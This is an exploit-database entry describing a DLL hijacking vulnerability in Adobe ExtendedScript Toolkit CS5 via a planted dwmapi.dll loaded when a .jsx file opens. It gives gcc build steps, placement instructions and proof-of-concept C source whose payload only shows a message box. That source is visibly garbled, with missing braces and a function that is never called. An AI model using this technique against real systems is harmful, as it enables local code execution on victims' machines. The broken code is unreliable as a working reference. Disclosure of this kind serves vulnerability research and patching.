Adobe ExtendedScript Toolkit CS5 v3.5.0.52 DLL Hijacking (dwmapi.dll)

ID 1337DAY-ID-13854
Type zdt
Reporter LiquidWorm
Modified 2010-08-25T00:00:00


Exploit for windows platform in category local exploits

Adobe ExtendedScript Toolkit CS5 v3.5.0.52 DLL Hijacking (dwmapi.dll)

 Adobe ExtendedScript Toolkit CS5 v3.5.0.52 (dwmapi.dll) DLL Hijacking Exploit
 Vendor: Adobe Systems Inc.
 Product Web Page:
 Affected Version: CS5 v3.5.0.52 ExtendScript 4.1.23 ScriptUI 5.1.37
 Summary: The ExtendScript Toolkit (ESTK) 3.5.0 is a scripting utility
 included with Adobe® Creative Suite CS5 and other Adobe applications.
 The ESTK is used for creating, editing, and debugging JavaScript to be
 used for scripting Adobe applications.
 Desc: Adobe ExtendScript Toolkit CS5 suffers from a dll hijacking vulnerability
 that enables the attacker to execute arbitrary code on a local level. The
 vulnerable extension is .jsx thru dwmapi.dll library.
 gcc -shared -o dwmapi.dll adobeest.c
 Compile and rename to dwmapi.dll, create a file test.jsx and put both files
 in same dir and execute.
 Tested on Microsoft Windows XP Professional SP3 (EN)
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com
 Zero Science Lab -
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
    switch (fdwReason)
        case DLL_PROCESS_ATTACH:
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
    return TRUE;
int dll_mll()
    MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);

# [2016-04-20]  #